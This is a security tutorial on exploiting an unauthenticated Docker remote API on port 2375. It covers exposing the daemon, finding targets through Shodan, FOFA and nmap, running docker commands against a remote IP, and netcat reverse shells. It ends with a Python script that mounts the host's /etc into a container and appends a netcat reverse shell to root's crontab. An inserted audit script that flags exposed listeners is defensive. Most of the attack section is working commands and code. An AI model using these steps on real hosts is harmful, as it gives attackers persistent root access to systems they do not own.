Cybersecurity Series [15]: Docker Unauthorized Access Vulnerability
Table of Contents
- Introduction to Docker
- Enabling remote access to Docker
- Vulnerability discovery
- Vulnerability exploitation
- Reverse shell
- Writing a reverse shell into crontab
Introduction to Docker
- Docker uses LXC to provide VM-like functionality, so that more computing resources can be offered to users while consuming less hardware. Unlike a VM, LXC is not a hardware virtualization method: it cannot be classified as full, partial or paravirtualization, but is an operating-system-level virtualization method, which may be less intuitive to understand than a VM. So let us start from the problems that virtualization, and Docker in particular, set out to solve, and look at how it meets users' virtualization needs.
Enabling remote access to Docker
systemctl status docker.service
vim /usr/lib/systemd/system/docker.service
Add the following to the ExecStart line so that the daemon also listens on TCP port 2375 (the socket path needs three slashes):
-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
Reload the service definition and restart Docker
systemctl daemon-reload
systemctl restart docker.service
- Firewall settings
ufw status
ufw allow 2375
ufw reload
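As an added example that is not part of the original post, the following Python audit parses a dockerd ExecStart line like the one edited above and flags a TCP listener that is reachable from other hosts without TLS client verification, beside a hardened variant that binds 2376 with `--tlsverify` (the sample lines and certificate paths are constructed for illustration):

```python
import shlex
from urllib.parse import urlparse

# Constructed samples (not from the original post): the ExecStart line the post
# edits, and a hardened variant that listens on 2376 with TLS client verification.
WEAK_EXECSTART = ("ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 "
                  "-H unix:///var/run/docker.sock")
HARDENED_EXECSTART = ("ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2376 --tlsverify "
                      "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
                      "--tlskey=/etc/docker/server-key.pem -H unix:///var/run/docker.sock")

def parse_hosts(execstart):
    """Return ([-H endpoints], tlsverify) parsed from a dockerd ExecStart line."""
    argv = shlex.split(execstart.split("=", 1)[1])
    hosts, tlsverify = [], False
    it = iter(argv)
    for arg in it:
        if arg in ("-H", "--host"):
            hosts.append(next(it, ""))
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg == "--tlsverify" or arg.startswith("--tlsverify="):
            tlsverify = not arg.endswith("=false")
    return hosts, tlsverify

def audit_execstart(execstart):
    """Classify each listener. 'EXPOSED' is the misconfiguration this page covers:
    a non-loopback TCP listener with no client-certificate verification."""
    hosts, tlsverify = parse_hosts(execstart)
    findings = {}
    for h in hosts:
        u = urlparse(h)
        if u.scheme in ("unix", "fd"):
            findings[h] = "OK: local socket"
        elif u.scheme == "tcp":
            if u.hostname in ("127.0.0.1", "localhost", "::1"):
                findings[h] = "OK: loopback only"
            elif tlsverify:
                findings[h] = "OK: TLS client auth required"
            else:
                findings[h] = "EXPOSED: unauthenticated TCP API"
        else:
            findings[h] = "UNKNOWN: scheme %r" % u.scheme
    return findings

if __name__ == "__main__":
    for name, line in (("weak", WEAK_EXECSTART), ("hardened", HARDENED_EXECSTART)):
        for host, verdict in audit_execstart(line).items():
            print(name, host, verdict)
```

Run it against the ExecStart line of a real host to confirm which listeners are reachable before allowing 2375 through the firewall.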
Vulnerability discovery
- Specific port: 2375
- Search engines: shodan, fofa
nmap -A -p- -T4 -Pn xx.xx.xx.xx
[root@yang ~]# nmap -A -p 2375 -T4 -Pn localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2025-07-10 18:20 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00019s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
2375/tcp open docker Docker 25.0.1
| docker-version:
| Components:
|
| Version: 25.0.1
| Name: Engine
| Details:
| ApiVersion: 1.44
| BuildTime: 2024-01-23T23:09:31.000000000+00:00
| MinAPIVersion: 1.24
| Experimental: false
| Os: linux
| Arch: amd64
| KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
| GitCommit: 71fa3ab
| GoVersion: go1.21.6
|
| Version: 1.6.27
| Name: containerd
| Details:
| GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
|
| Version: 1.1.11
| Name: runc
| Details:
| GitCommit: v1.1.11-0-g4bccb38
|
| Version: 0.19.0
| Name: docker-init
| Details:
| GitCommit: de40ad0
| BuildTime: 2024-01-23T23:09:31.000000000+00:00
| ApiVersion: 1.44
| GoVersion: go1.21.6
| Arch: amd64
| MinAPIVersion: 1.24
| Os: linux
| Version: 25.0.1
| KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
| GitCommit: 71fa3ab
| Platform:
|_ Name: Docker Engine - Community
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: application/json
| Date: Thu, 10 Jul 2025 10:20:33 GMT
| Content-Length: 29
| {"message":"page not found"}
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: application/json
| Date: Thu, 10 Jul 2025 10:20:08 GMT
| Content-Length: 29
| {"message":"page not found"}
| HTTPOptions:
| HTTP/1.0 200 OK
| Api-Version: 1.44
| Docker-Experimental: false
| Ostype: linux
| Server: Docker/25.0.1 (linux)
| Date: Thu, 10 Jul 2025 10:20:08 GMT
| Content-Length: 0
| docker:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.60 seconds
Vulnerability exploitation
- Container state can be read directly through the API; version and info return detailed information, and the processes running in containers can be listed directly.
docker -H tcp://18.16.202.95:2375 version
docker -H tcp://18.16.202.95:2375 images
docker -H tcp://18.16.202.95:2375 info
docker -H tcp://18.16.202.95:2375 ps
- Use the run command to create and start a container.
docker -H tcp://xx.xx.xx.xx:2375 run -it redis /bin/bash
Reverse shell
- Start a listener on the attacking machine
nc -lvvp 8030
- Run on the target machine
nc 192.168.1.21 8030 -e /bin/sh
nc 192.168.1.21 8030 -e sh
Writing a reverse shell into crontab
cd /root
cat exp.py
import docker

# connect to the remote API exposed on port 2375
client = docker.DockerClient(base_url='http://your-ip:2375')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})